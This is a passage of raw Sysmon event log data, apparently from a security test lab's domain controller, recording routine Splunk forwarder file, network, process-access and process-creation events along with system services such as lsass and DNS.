Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2793497DF54B604069EDA1C214B7416B,SHA256=E8BE6944324FBD6068BA4A026DEAA4F9FCEEC94165F53D2E427216CB29A00D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203785Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:51.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F9F5FDDBD9DB63FE6F14256B04FFBE,SHA256=BDD2E267B3B8F3466137E479BAC6C6FF82F6D5FE92DC36574F1BC44B625CDE14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203784Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:51.134{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C9AEFEDC2AD9102E0ABD5FF666FE9600,SHA256=AF7DE50FBF131939DF5F79B0B3963A8384BA4A722B09A0CA7AE8BB569FDC7B50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203787Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:52.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95CB9F15A864EC06DA8B006BC0E0B445,SHA256=EB05465D6BE83819D86DB85FF75FD17A1CBB3A4C31305EB8B20495163E4357A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203786Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:47.970{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60729-false10.0.1.12-8000- 23542300x80000000000000002203788Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:53.649{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFF82DC598C521E85C1916D5118E71A2,SHA256=6C06F27F2055C332DF0DA0DD3DB41819FF98460318E34D645BE3E5CE3A5A45C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203789Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:54.649{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2B2253713EDF006EE26515960DFBDE9,SHA256=902B08FD176395EA6BBC3E00AD580E32A8EF1341386FC1B0C57EAEC2D011464E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203790Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:55.665{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C66F5DF732BF1CD64AFA979CAA7B7E2,SHA256=3A9C827665EB7CF17772D1B512444F235F54A7C55A6845E39C6EF459F0BFDC24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203793Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:56.680{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D4A91034E9C6ABD6974F6B1B25389D,SHA256=64F01064F4387BC0E10AE1D3D667779AE05A33AF223A96DF31FE6929407DE8E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203792Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:56.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79ADC18A2FF5B42D7D8DFA20436BC70B,SHA256=89E52B6CAF7370C9500BC0CC8F8C80630D9CA93FC1A8EC9BE010540F0685EC0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203791Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:56.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7309F60F52A1123BB716E8AA7A730E8E,SHA256=3DFAB07E4469F9170F48BB855B0425C7919944B1269E1651543BB4ED08D27657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203798Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:57.696{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B947378B53065C8AADE1B937C54CB400,SHA256=EE2CF3E2C6B6C4FF4A3FAE891CE1F50F6DC4F7283D0B35A6D486A625F181E373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203797Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:57.321{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79ADC18A2FF5B42D7D8DFA20436BC70B,SHA256=89E52B6CAF7370C9500BC0CC8F8C80630D9CA93FC1A8EC9BE010540F0685EC0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203796Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:53.907{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60731-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002203795Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:53.907{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60731-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002203794Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:53.032{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60730-false10.0.1.12-8000- 23542300x80000000000000002203801Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:58.696{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=404CD080EC10D5A4D8179FED2542DA3F,SHA256=9013495D64F833FC77CBF6FFEB4DDECF7C3B61CDBB1D71986EED8CE80E1E4DA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203800Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:54.157{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local56703- 23542300x80000000000000002203799Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:58.321{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0CD97F197494D5FC0AC966106E2F440,SHA256=09A5E06CCDF06562A61820B47C1F0469ED137B42E293F4A99BAF3AB3CB6111B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203803Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:59.696{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B5EACC37FFC9B88F4DA281D445647F1,SHA256=3102D0FB0950E0A48B6D9E78716FA8E95295428BAB80602443DEF0E24F8EE123,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203802Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:55.157{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-56703- 23542300x80000000000000002203804Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:00.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87CA24ACD9DA537B3436CFCAFF3EBAE1,SHA256=FECF88BD3CE586435097E32875FB346663DDA75212F3134EB03613FFD2C03632,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203807Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646570C22D4F6F741A14811E557EDDE5,SHA256=25127E033A0B207D6A63B0A6A42430AB84B79FBA7A3AA1720F006E18D8C642BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203806Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:58.048{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60732-false10.0.1.12-8000- 23542300x80000000000000002203805Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.212{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55916BA531BDE6B612223C851ECC7BDB,SHA256=62EAC92545E44FCD083959C53CA62207E3E3FA54FD4D31EEE3C30043AFCD041E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203825Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9FE-6040-5B4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203824Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203823Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203822Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203821Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203820Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E9FE-6040-5B4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203819Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9FE-6040-5B4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203818Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.884{5ABCFE62-E9FE-6040-5B4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203817Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.727{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADB74B7B48F07D1405B01EA93E6E5FA3,SHA256=EC4301A9DCD5C855BD6289E805C49374393CD46420FA2972F61A41F80F4AD6AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203816Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.352{5ABCFE62-E9FE-6040-5A4E-00000000AD01}62123192C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203815Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9FE-6040-5A4E-00000000AD01}6212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203814Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203813Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203812Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203811Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203810Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E9FE-6040-5A4E-00000000AD01}6212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203809Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9FE-6040-5A4E-00000000AD01}6212C:\Program 